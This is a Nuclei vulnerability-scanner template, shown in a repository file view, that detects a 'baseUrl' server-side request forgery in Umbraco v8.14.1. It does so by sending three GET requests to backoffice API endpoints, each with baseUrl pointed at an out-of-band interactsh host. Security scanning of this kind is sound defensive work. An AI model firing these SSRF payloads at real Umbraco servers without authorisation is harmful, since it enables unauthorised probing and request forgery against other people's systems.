nuclei-templates/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml

28 lines
981 B
YAML
Raw Normal View History

2021-10-30 05:33:14 +00:00
id: umbraco-base-ssrf
info:
name: Umbraco v8.14.1 - 'baseUrl' SSRF
author: dhiyaneshDk
severity: medium
reference: https://www.exploit-db.com/exploits/50462
2021-10-30 05:33:14 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.30
cve-id: CVE-2020-10770
cwe-id: CWE-601
2021-10-30 16:36:04 +00:00
tags: ssrf,umbraco,oast
2021-10-30 05:33:14 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}'
- '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/'
- '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/'
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"